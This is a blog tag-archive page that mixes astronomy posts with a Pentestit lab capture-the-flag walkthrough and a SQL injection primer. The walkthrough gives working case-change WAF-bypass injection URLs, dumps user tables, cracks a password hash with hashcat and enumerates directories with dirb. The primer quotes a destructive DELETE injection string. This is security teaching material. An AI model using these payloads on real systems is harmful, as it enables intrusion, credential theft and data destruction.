Tag Archives: astronomy

Retrograde Orbits

(note: This animation has no audio track.) – The Open University

Although many moons in the Solar System follow prograde orbits, there are some notable exceptions. The gas giant planets Jupiter, Saturn, Uranus and Neptune have several small outer moons that follow retrograde orbits; this means that they orbit their planet in the opposite direction to the planet’s rotation. In a retrograde orbit, a moon revolves in its orbit in the opposite direction from that in which the planet rotates about its axis.

Video by The Open University.

More information at https://www.futurelearn.com

Pentestit Lab v10 – The Site Token

In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:

  • Mapping the Attack Surface & Defenses
  • Exploiting SQL Injection w/ WAF Bypass
  • Cracking SQL Hashes
  • Finding the Site Token

If you are reading this post for the first time, and have no clue on what’s going on – then I suggest you start from the beginning and read “Pentestit Lab v10 – Introduction & Setup”.

I also included a ton of resources in my second post that I linked above – you should seriously check that out if you already haven’t!

Mapping the Attack Surface & Defenses:

Whenever we attempt to attack a web application, we have to start by mapping out the web app and its associated structure. That means finding directories, hidden links, files, URL Query’s, etc.

Once we mapped our application – we can start by looking for vulnerabilities such as SQL Injection, XSS, Path Traversal, etc.

For the Global Data Security website (which I will call GDS from now on), I considered the Security Blog a good starting point.

192.168.101.9 443 - Security Blog
192.168.101.9 443 – Security Blog

After going through all the links on the website, I noticed a particular URL parameter in the blog posts that caught my eye.

192.168.101.9 mobile hack test page

Notice the id parameter being passed into the URL after post.php? We can actually test this parameter for SQL Injection!

Exploiting SQL Injection w/ WAF Bypass:

I began trying to exploit the id parameter, but for some reason every time I injected some SQL code, I was taken back to the home page.

This made me consider that there might be a WAF or Web Application Firewall in place, preventing me from exploiting this SQL Injection.

I decided to attempt a Case Change Bypass to see if I can somehow bypass the filter. This is due to the fact that some WAF’s only filter lowercase SQL keywords.

I began by injecting the following into the URL:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,2%23

After submitting the query – you can see that the SQL Injection is in fact there, and that the Case Change allowed me to bypass the WAF filter.

192.168.101.9 sql inject testing 1-2

Now that we got the SQL Injection to work – let’s start by pulling all the tables in the database with the following:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23

192.168.101.9 sql inject test page

Nice! Now that we got our table names, let’s pull all the columns from the “site” table.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28TAblE_NaME,0x20,CoLumN_NaME%29+FrOm+iNfOrmaTioN_scHeMa.ColUmNs+WHerE+tAblE_SchEma=%27site%27%23

 

192.168.101.9 sql inject testing tables

We see that the users table has a username and password column, so let’s go ahead and dump any data in those columns.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28useRnAMe,0x20,paSswOrD%29+FrOm+site.users%23

 

192.168.101.9 sql inject lindsey

Cracking MySQL Hashes:

Awesome, we got another username, and a SQL Hash of the associated user’s password. Let’s first start by saving the username for future reference, along with the other usernames we have.

root@kali:~/gds# nano names
root@kali:~/gds# cat names 
a.modlin@gds.lab
s.locklear@gds.lab
j.wise@gds.lab
e.lindsey@gds.lab

Since we got a SQL Hash, let’s use hash-identifier to see what type of hash it is. Then, we can use HashCat to try and crack it!

root@kali:~/gds# nano lindsey_hash
root@kali:~/gds# cat lindsey_hash 
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.


root@kali:~/gds# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Possible Hashs:
[+]  MD5(Unix)

   -------------------------------------------------------------------------

root@pentestit:~# hashcat -m 500 -a o lindsey_hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Skipping line: cat lindsey_hash (signature unmatched)
Added hashes from file lindsey_hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => r
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.:lindsey123
                                            
All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 20.45k words
Progress..: 166528/3605274 (4.62%)
Running...: 00:00:00:09
Estimated.: 00:00:02:48


Started: Mon Mar 20 07:46:37 2017
Stopped: Mon Mar 20 07:46:46 2017

After some time we see that the MD5 Hash is that of the password lindsey123.

Finding the Site Token:

Since we were able to compromise a username and password, we need to find a place where we can leverage these credentials.

At this point, I decide to run dirb to try and enumerate any interesting directories that I might have missed.

root@pentestit:~# dirb http://192.168.101.9:443

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 07:50:58 2017
URL_BASE: http://192.168.101.9:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612 

---- Scanning URL: http://192.168.101.9:443/ ----
==> DIRECTORY: http://192.168.101.9:443/admin/ 
==> DIRECTORY: http://192.168.101.9:443/css/ 
==> DIRECTORY: http://192.168.101.9:443/img/ 
+ http://192.168.101.9:443/index.php (CODE:200|SIZE:7343) 
==> DIRECTORY: http://192.168.101.9:443/js/ 
==> DIRECTORY: http://192.168.101.9:443/mail/ 
==> DIRECTORY: http://192.168.101.9:443/vendor/ 
 
---- Entering directory: http://192.168.101.9:443/admin/ ----
+ http://192.168.101.9:443/admin/index.php (CODE:302|SIZE:0) 
 
---- Entering directory: http://192.168.101.9:443/css/ ----
 
---- Entering directory: http://192.168.101.9:443/img/ ----
 
---- Entering directory: http://192.168.101.9:443/js/ ----

---- Entering directory: http://192.168.101.9:443/mail/ ----

---- Entering directory: http://192.168.101.9:443/vendor/ ----
==> DIRECTORY: http://192.168.101.9:443/vendor/jquery/ 
 
---- Entering directory: http://192.168.101.9:443/vendor/jquery/ ----
 
-----------------
END_TIME: Mon Mar 20 08:00:01 2017
DOWNLOADED: 36896 - FOUND: 2

The admin console looks promising! So let’s go ahead and log in there!

192.168.101.9 site login and token

 

Once logged in, you should automatically see the Site Token on the main page.

Token (2/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the Blog to get the token!

Site  Token complete.PNG

You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (3/13) – The SSH Token!

The Anatomy of a Web Application – SQL Injection

A web application is the target of a SQL injection attack, so you must understand how these apps work. A web app can be described simply as an application that is accessed through a web browser or application (such as the apps on a smartphone). However, we need to be a little more detailed with our description in order to better understand SQL injection. In essence, a web application works by performing these steps:

  1. The user makes a request through the web browser from the Internet to the web server.
  2. The web server accepts the request and forwards it to the applicable web application server.
  3. The web application server performs the requested task.
  4. The web application accesses the entire database available and responds to the web server.
  5. The web server responds back to the user once the transaction is complete.
  6. The requested information appears on the user’s monitor. The details involved in these steps can change depending on the application involved.

webapplicationfirewall

Server-side vs. Client-side

First let’s look at the type of technologies involved in browsing and working with the Web. They mainly fall into two areas: client-side and server-side. Server-side technologies are those that run and are executed on the server itself before delivering information to the requester. Client-side technologies are those that run within the browser or somewhere on the client side. For the purposes of our discussion, we will not be covering client-side here.

Server-side technologies come in many varieties and types, each of which offers something specific to the user. Generally, each of the technologies allows for the creation of dynamic and data-driven web applications. There are a wide range of server-side technologies that you can use to create these types of web applications, among them:

  • ASP
  • ASP.NET
  • Oracle
  • PHP
  • JSP
  • SQL Server
  • IBM DB2
  • MySQL
  • RubyOnRails

All of these technologies are powerful and offer the ability to generate web applications that are extremely versatile. Each also has vulnerabilities that can lead to them being compromised, but this chapter is not about those. This chapter, like SQL injection, is designed to target the code that is used to make the technologies access a database as part of its functioning. This code, when incorrectly crafted, can be scrutinized and result in vulnerabilities uncovered and exploited.

All that is SQL Injection

Introducing SQL Injection

SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:

  • SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
  • SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
  • The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data. • The usual cause of this type of flaw is improper or absent input validation, thus allowing code to pass unimpeded to the database without being verified.

sql-injection

SQL Attacks in Action

In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing. SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.

In the following example, an attacker with the username link inputs for the original code after the = sign in WHERE owner which used to include the string ‘name’; DELETE FROM items; — for itemName into an existing SQL command, and the query becomes the following two queries:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items;--

Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.

If an attacker enters the string ‘name’; DELETE FROM items; SELECT * FROM items WHERE ‘a’ = ‘a’, the following three valid statements will be created:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items; 
SELECT * FROM items WHERE 'a' = 'a';

A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.

Results of SQL Injection

What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.

If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:

  • Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
  • Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
  • Alteration of data or outright replacement of data in existing databases with information created by the attacker.
  • Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
  • Denial of service, performed by flooding the server with requests designed to overwhelm the system.
  • Data extraction and disclosure of all data on the system through the manipulation of the database.
  • Destruction or corruption of data through rewriting, altering, or other means.
  • Eliminating or altering transactions that have been or will be committed

 

Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.

Seeing things sideways

This image from Hubble’s Wide Field Camera 3 (WFC3) shows NGC 1448, a spiral galaxy located about 50 million light-years from Earth in the little-known constellation of Horologium (The Pendulum Clock). We tend to think of spiral galaxies as massive and roughly circular celestial bodies, so this glittering oval does not immediately appear to fit the visual bill. What’s going on?

Imagine a spiral galaxy as a circular frisbee spinning gently in space. When we see it face on, our observations reveal a spectacular amount of detail and structure — a great example from Hubble is the telescope’s view of Messier 51, otherwise known as the Whirlpool Galaxy. However, the NGC 1448 frisbee is very nearly edge-on with respect to Earth, giving it an appearance that is more oval than circular. The spiral arms, which curve out from NGC 1448’s dense core, can just about be seen.

Although spiral galaxies might appear static with their picturesque shapes frozen in space, this is very far from the truth. The stars in these dramatic spiral configurations are constantly moving and spinning around the galaxy’s core, with those on the inside whirling around faster than those sitting further out. This makes the formation and continued existence of a spiral galaxy’s arms something of a cosmic puzzle, because the arms wrapped around the spinning core should become wound tighter and tighter as time goes on — but this is not what we see. This is known as the winding problem.Credit:

ESA/Hubble & NASA

Quasar’s light yields clues to outflow

This artist’s impression shows the light of several distant quasars piercing the northern half of the Fermi Bubbles, an outflow of gas expelled by the supermassive black hole in the centre of the Milky Way. The NASA/ESA Hubble Space Telescope probed the quasars’ light for information on the speed of the gas and whether the gas is moving toward or away from Earth. Based on the material’s speed, the research team estimated that the bubbles formed from an energetic event between 6 million and 9 million years ago.

The inset diagram at bottom left shows the measurement of gas moving toward and away from Earth, indicating the material is traveling at a high velocity.

Hubble also observed light from quasars that passed outside the northern bubble. The box at upper right reveals that the gas in one such quasar’s light path is not moving toward or away from Earth. This gas is in the disc of the Milky Way and does not share the same characteristics as the material probed inside the bubble.

Link:

Credit:

NASA, ESA, and Z. Levy (STScI)